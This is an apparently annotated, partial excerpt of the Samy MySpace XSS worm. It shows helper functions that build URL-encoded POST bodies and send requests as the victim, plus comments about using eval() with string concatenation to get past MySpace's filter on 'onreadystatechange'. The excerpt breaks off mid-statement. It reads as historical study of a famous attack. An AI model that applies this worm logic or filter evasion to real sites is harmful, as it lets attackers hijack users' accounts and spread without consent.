This is
// used when Samy wanted to make an HTTP request and did not care about
// the response (like CSRF).
function nothing() {
  // Intentional no-op: used when an HTTP request is made and its response
  // is ignored. Takes no arguments and returns undefined.
}
// Convert the queryParameterArray back to a "&" delimited string with some
// URL encoding. The string is used as the body of POST request that changes
// the victim's information.
function parameterArrayToParameterString(queryParameterArray) {
  // Builds "name=value&name=value" from every enumerable property of
  // queryParameterArray (for...in, so inherited enumerable keys count too).
  //
  // Only the values are encoded; the property names are emitted verbatim.
  // Encoding uses the legacy escape() function, which leaves "+" untouched,
  // so "+" is rewritten to "%2B" by hand. escape() already turns "&" into
  // "%26", so the second rewrite is a belt-and-braces step that does not
  // change escape()'s output.
  //
  // The accumulator starts as a String wrapper object, as in the original,
  // so an input with no enumerable properties returns that wrapper rather
  // than a primitive "".
  let body = new String();
  let isFirstPair = true;

  for (const name in queryParameterArray) {
    if (!isFirstPair) {
      body += '&';
    }
    isFirstPair = false;

    const encodedValue = escape(queryParameterArray[name])
      .split('+')
      .join('%2B')
      .split('&')
      .join('%26');

    body += name + '=' + encodedValue;
  }

  return body;
}
// This is the first of two POST requests that the worm does on behalf of
// the user. This function simply makes a request to "url" with POST body
// "xhrBody" and runs "xhrCallbackFunction()" when the HTTP response is
// complete.
function httpSend(url, xhrCallbackFunction, requestAction, xhrBody) {
if (!xmlHttpRequest) {
return false
}
// Apparently, Myspace blocked user content containing "onreadystatechange", so
// Samy used string concatenation with eval() to circumvent the blocking.
eval('xmlHttpRequest.